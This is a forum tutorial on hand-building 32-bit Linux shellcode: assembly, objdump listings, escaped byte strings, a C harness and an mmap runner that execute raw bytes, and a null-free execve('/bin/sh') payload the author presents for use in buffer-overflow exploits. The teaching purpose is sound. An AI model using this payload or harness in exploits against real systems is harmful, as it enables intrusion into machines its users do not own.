Let's write some Shellcode
This is a follow-up to my previous thread,
https://evilzone.org/tutorials/let's-write-a-buffer-overflow/ and although it's not essential, I suggest you read it if you would like to understand how what we produce in this tutorial can be used in an exploit.
In recent days I've noticed a lot of people don't understand how Shellcode is created and speak of it as if it's some mystical art. Honestly, it's anything but. Shellcode is simply machine code written out in a more convenient form, usually a string of escaped bytes. In this tutorial you will learn the basics of designing Executable Shellcode. For a tutorial on Return Oriented Shellcode, please refer to Divine's wonderful tutorial on Return Oriented Programming.
What can we use Shellcode to do?
In short, anything (within reason).
Note: I will be covering both Linux and Windows Shellcode in two separate tutorials.
How do we create Executable Shellcode?
Good question, and an easy one to answer too. You could write Shellcode by hand, but that quickly becomes extremely tedious. What we're going to do instead is write the code we want executed in ASM and convert it to Shellcode. So let's begin with a simple "Hello Ergo!" example:
Below is the basic assembly code for the program.
;example.asm
global _start
SECTION .text
_start:
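mov eax, 0x4 ;syscall 4 = write
mov ebx, 0x1 ;file descriptor 1 = stdout
mov ecx, msg ;set the message
mov edx, 0xD ;length of the message (13 bytes)
int 0x80 ;display the message
mov eax, 0x1 ;syscall 1 = exit
mov ebx, 0x0 ;exit status 0
int 0x80 ;quit the program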
SECTION .data
msg db 'Hello Ergo!',0dh,0ah
cogito@ergo:~$ nasm -f elf example.asm
cogito@ergo:~$ ld example.o -o example
cogito@ergo:~$ objdump -d example
example: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: b8 04 00 00 00 mov $0x4,%eax
8048085: bb 01 00 00 00 mov $0x1,%ebx
804808a: b9 a4 90 04 08 mov $0x80490a4,%ecx
804808f: ba 0d 00 00 00 mov $0xd,%edx
8048094: cd 80 int $0x80
8048096: b8 01 00 00 00 mov $0x1,%eax
804809b: bb 00 00 00 00 mov $0x0,%ebx
80480a0: cd 80 int $0x80
And thus the shellcode would be:
\xb8\x04\x00\x00\x00
\xbb\x01\x00\x00\x00
\xb9\xa4\x90\x04\x08
\xba\x0d\x00\x00\x00
\xcd\x80
\xb8\x01\x00\x00\x00
\xbb\x00\x00\x00\x00
\xcd\x80
Now, this won't work as Shellcode. There are several rules you need to follow when designing it. One of these rules is that we cannot access the .data section, because it is not included when we dump the bytes to create the Shellcode. As shown above, msg has been replaced by an absolute memory address (0x80490a4). This memory address means NOTHING when the Shellcode is executed on its own inside another process. Only the contents of the .text section end up in the Shellcode.
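To make the problem concrete, here is a small sketch in C that decodes the operand of the third instruction in the dump above. The helper names read_le32 and msg_address are my own, not part of any library. The four bytes after the b9 opcode are a little-endian absolute address, and that is exactly the part that stops making sense once the bytes run somewhere else.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: read a 32-bit little-endian value from a byte buffer. */
static uint32_t read_le32(const unsigned char *p)
{
    assert(p != NULL);
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}

/* Bytes of "mov ecx, msg" exactly as objdump printed them. */
static const unsigned char mov_ecx_msg[] = { 0xb9, 0xa4, 0x90, 0x04, 0x08 };

/* Skip the one-byte opcode (0xb9) and decode the immediate operand. */
static uint32_t msg_address(void)
{
    return read_le32(mov_ecx_msg + 1);
}
```

msg_address() gives 0x080490a4, the same address objdump printed for msg. That address only points at our string inside the example binary itself.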
But how do we print some text if we're only using the .text?
A good question, another simple answer. Instead of the above ASM code, we're going to do something different. Don't worry if you don't understand what I'm doing instantly, I will explain the important areas.
global _start
SECTION .text
_start:
jmp string
display:
mov eax, 0x4
mov ebx, 0x1
pop ecx ;set the message
mov edx, 0xD
int 0x80 ;display the message
mov eax, 0x1
mov ebx, 0x0
int 0x80 ;quit the program
string:
call display
db 'Hello Ergo!',0dh,0ah
I shouldn't really need to go through much of this as I'm sure you're all fairly competent in ASM, so I'll just go over the main point.
In order to display the text, we need to get a memory address of the text itself. The above method is a pretty smart way to do this. First, the program jumps to the label "string". When it does so, it proceeds to call to the label "display". As you know, when you use the call instruction, the computer pushes the address of the next instruction to be executed onto the stack for future reference (for when the program returns).
In the display label, we've done everything as we normally would with one exception. Instead of doing "mov ecx, msg" we have done "pop ecx". The return address pushed by the call is the address of the bytes immediately after it, which is our string, so we pop that address from the stack into the appropriate register.
So now this should work, right? Let's assemble and view the bytes.
example: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 1e jmp 8048080 <string>
08048062 <display>:
8048062: b8 04 00 00 00 mov $0x4,%eax
8048067: bb 01 00 00 00 mov $0x1,%ebx
804806c: 59 pop %ecx
804806d: ba 0d 00 00 00 mov $0xd,%edx
8048072: cd 80 int $0x80
8048074: b8 01 00 00 00 mov $0x1,%eax
8048079: bb 00 00 00 00 mov $0x0,%ebx
804807e: cd 80 int $0x80
08048080 <string>:
8048080: e8 dd ff ff ff call 8048062 <display>
8048085: 48 dec %eax
8048086: 65 gs
8048087: 6c insb (%dx),%es:(%edi)
8048088: 6c insb (%dx),%es:(%edi)
8048089: 6f outsl %ds:(%esi),(%dx)
804808a: 20 45 72 and %al,0x72(%ebp)
804808d: 67 6f outsl %ds:(%si),(%dx)
804808f: 21 .byte 0x21
8048090: 0d .byte 0xd
8048091: 0a .byte 0xa
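The jmp and call operands in the dump above are relative displacements, not absolute addresses, which is why this version keeps working wherever it is loaded. As a rough check, here is a sketch in C (the function names are my own) that redoes the arithmetic using offsets from the start of the Shellcode, so 0x8048060 becomes offset 0x00.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offset a relative jmp/call lands on: the displacement is added to the
 * offset of the *next* instruction (insn_offset + insn_len). */
static size_t rel_target(size_t insn_offset, size_t insn_len, int32_t disp)
{
    long target = (long)insn_offset + (long)insn_len + (long)disp;
    assert(target >= 0); /* a target before the start of the buffer makes no sense here */
    return (size_t)target;
}

/* "eb 1e": short jmp at offset 0x00, 2 bytes long, 8-bit displacement 0x1e. */
static size_t jmp_target(void)
{
    return rel_target(0x00, 2, 0x1e);
}

/* "e8 dd ff ff ff": call at offset 0x20, 5 bytes long.
 * The operand 0xffffffdd read as a signed 32-bit value is -35. */
static size_t call_target(void)
{
    return rel_target(0x20, 5, -35);
}

/* The return address pushed by that call: the byte right after it,
 * which is where the 'H' (0x48) of our string sits. */
static size_t pushed_return_offset(void)
{
    return 0x20 + 5;
}
```

jmp_target() comes out as 0x20 (the string label), call_target() as 0x02 (the display label), and pushed_return_offset() as 0x25, which corresponds to 0x8048085 in the dump.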
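Note that objdump has tried to disassemble our string as if it were instructions; everything after the call is just the text. As Shellcode, the same bytes are: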
\xeb\x1e\xb8\x04\x00\x00\x00
\xbb\x01\x00\x00\x00
\x59
\xba\x0d\x00\x00\x00
\xcd\x80
\xb8\x01\x00\x00\x00
\xbb\x00\x00\x00\x00
\xcd\x80
\xe8\xdd\xff\xff\xff
\x48
\x65
\x6c
\x6c
\x6f
\x20\x45\x72
\x67\x6f
\x21
\x0d
\x0a
How do we test it and see whether it'll execute or not?
Well, there are lots of ways, but my favorite is just to write a quick program in C that uses a function pointer to execute the Shellcode.
Here's our code:
//
//Shellcode Executor
//shell.c
//
char code[] = "\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0d\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x45\x72\x67\x6f\x21\x0d\x0a";
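int main(int argc, char **argv)
{
    int (*point)(void);            //function pointer returning int
    point = (int (*)(void)) code;  //point it at the Shellcode bytes
    return point();                //call the Shellcode as if it were a function
}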
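This declares a function pointer, sets it to the address of the Shellcode, and then calls through it, so the CPU starts executing our bytes as if they were an ordinary function. Note that this Shellcode is 32-bit; on a 64-bit system you will probably need to build with gcc -m32, and where NX is enforced the array has to end up in executable memory for the call to succeed.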
cogito@ergo:~$ gcc -o shell shell.c
cogito@ergo:~$ ./shell
Hello Ergo!
cogito@ergo:~$
Success!
Is that all there is to it?
Unfortunately not. As you begin to experiment with Shellcode you will come across a lot of reasons why Shellcode fails to execute. For example, null bytes can cut the Shellcode short when it is copied as a C string (functions such as strcpy stop at the first \x00), ASLR can make the addresses you rely on unpredictable, and the NX bit (No-Execute) can stop the memory holding your Shellcode from being executed at all. This is why Shellcode writing can get a bit difficult. You need to really understand how the operating system works and how its protections can be bypassed.
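NX is the obstacle most likely to bite when you are only testing. One way around it, sketched here under my own assumptions, is to copy the bytes into memory that has been explicitly mapped as executable with mmap before calling them. The names run_bytes and stub are hypothetical, and the stub is a harmless snippet of my own rather than anything from this thread.

```c
#define _DEFAULT_SOURCE /* for MAP_ANONYMOUS under strict -std= modes */
#include <assert.h>
#include <string.h>
#include <sys/mman.h>

/* Copy len bytes of machine code into a fresh executable mapping, call it
 * as "int f(void)", and return its result. Returns -1 if mmap fails. */
static int run_bytes(const unsigned char *bytes, size_t len)
{
    assert(bytes != NULL && len > 0);

    /* Writable as well as executable, because some Shellcode stores data
     * in its own buffer while it runs. */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    memcpy(mem, bytes, len);
    int (*fn)(void) = (int (*)(void))mem;
    int result = fn();

    munmap(mem, len);
    return result;
}

/* Harmless x86 test stub (an assumption of this sketch):
 * mov eax, 42 ; ret */
static const unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
```

On an x86 Linux machine, run_bytes(stub, sizeof stub) should hand back 42. Shellcode that ends in an exit syscall, like the Hello Ergo! example, never returns to the caller, so the munmap line is simply not reached in that case.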
So let's try something a little more impressive than just displaying a message. We'll be creating some Shellcode that spawns a shell (hence the name Shellcode). The code below uses the same jmp/call/pop technique as above to get the address of its string. Here is a first attempt, disassembled:
shell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 1b jmp 804807d <location>
08048062 <shell>:
8048062: b8 00 00 00 00 mov $0x0,%eax
8048067: 5e pop %esi
8048068: 88 46 07 mov %al,0x7(%esi)
804806b: 89 76 08 mov %esi,0x8(%esi)
804806e: 89 46 0c mov %eax,0xc(%esi)
8048071: b0 0b mov $0xb,%al
8048073: 8d 1e lea (%esi),%ebx
8048075: 8d 4e 08 lea 0x8(%esi),%ecx
8048078: 8d 56 0c lea 0xc(%esi),%edx
804807b: cd 80 int $0x80
0804807d <location>:
804807d: e8 e0 ff ff ff call 8048062 <shell>
8048082: 2f das
8048083: 62 69 6e bound %ebp,0x6e(%ecx)
8048086: 2f das
8048087: 73 68 jae 80480f1 <location+0x74>
Will this work? Nope, there are several null bytes, all of them from the first instruction: "mov eax,0x0" assembles to b8 00 00 00 00. "xor eax,eax" is an alternative to "mov eax,0x0" that also zeroes eax but assembles to 31 c0, so it doesn't produce any null bytes. If we use that, we can combat this problem.
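Checking for null bytes by eye gets old quickly. A minimal sketch of a checker in C, with names of my own choosing, applied to the two encodings just mentioned:

```c
#include <assert.h>
#include <stddef.h>

/* Count the 0x00 bytes in a candidate Shellcode buffer. */
static size_t count_null_bytes(const unsigned char *code, size_t len)
{
    assert(code != NULL || len == 0);
    size_t count = 0;
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            count++;
    }
    return count;
}

/* The two ways of zeroing eax discussed above. */
static const unsigned char mov_eax_0[]   = { 0xb8, 0x00, 0x00, 0x00, 0x00 };
static const unsigned char xor_eax_eax[] = { 0x31, 0xc0 };
```

count_null_bytes(mov_eax_0, sizeof mov_eax_0) is 4 and count_null_bytes(xor_eax_eax, sizeof xor_eax_eax) is 0. Pass sizeof of a byte array as the length rather than strlen, since strlen itself stops at the first null.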
So let's try this again.
global _start
SECTION .text
_start:
jmp location
shell:
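xor eax,eax ;eax = 0 without encoding any null bytes
pop esi ;esi = address of "/bin/sh"
mov byte [esi+7],al ;null-terminate the string
mov dword [esi+8],esi ;argv[0] = address of the string
mov dword [esi+12],eax ;argv[1] = NULL
mov al,0xb ;syscall 11 = execve
lea ebx,[esi] ;ebx = filename
lea ecx,[esi+8] ;ecx = argv
lea edx,[esi+12] ;edx = envp (points at the NULL)
int 0x80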
location:
call shell
db "/bin/sh"
Which dumps as:
shell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 18 jmp 804807a <location>
08048062 <shell>:
8048062: 31 c0 xor %eax,%eax
8048064: 5e pop %esi
8048065: 88 46 07 mov %al,0x7(%esi)
8048068: 89 76 08 mov %esi,0x8(%esi)
804806b: 89 46 0c mov %eax,0xc(%esi)
804806e: b0 0b mov $0xb,%al
8048070: 8d 1e lea (%esi),%ebx
8048072: 8d 4e 08 lea 0x8(%esi),%ecx
8048075: 8d 56 0c lea 0xc(%esi),%edx
8048078: cd 80 int $0x80
0804807a <location>:
804807a: e8 e3 ff ff ff call 8048062 <shell>
804807f: 2f das
8048080: 62 69 6e bound %ebp,0x6e(%ecx)
8048083: 2f das
8048084: 73 68 jae 80480ee <location+0x74>
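The three mov stores in the listing above build a small block of memory at esi before the syscall. The following C sketch models that block without executing anything; build_execve_block is a name I made up, and base stands in for whatever esi happens to be at run time.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Model of the 16-byte block the Shellcode builds at esi.
 * base is a stand-in for the run-time value of esi. */
static void build_execve_block(unsigned char block[16], uint32_t base)
{
    assert(block != NULL);
    uint32_t zero = 0;

    memset(block, 0x41, 16);       /* pretend whatever follows the string is junk */
    memcpy(block, "/bin/sh", 7);   /* db "/bin/sh" (no terminator in the source) */
    block[7] = 0;                  /* mov byte [esi+7],al    -> terminate the string */
    memcpy(block + 8, &base, 4);   /* mov dword [esi+8],esi  -> argv[0] = the string */
    memcpy(block + 12, &zero, 4);  /* mov dword [esi+12],eax -> argv[1] = NULL */
}
```

With that block in place, ebx = base, ecx = base+8 and edx = base+12, so the syscall amounts to execve("/bin/sh", argv, envp) with argv = {"/bin/sh", NULL} and an empty envp. Note that the stores write 9 bytes past the end of the 7-byte string, so the memory right after the Shellcode has to be writable.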
And after putting these bytes into our function pointer code:
cogito@ergo:~$ ./shell
sh-2.05b$
Another Success.
Thanks for reading and I hope you learned something.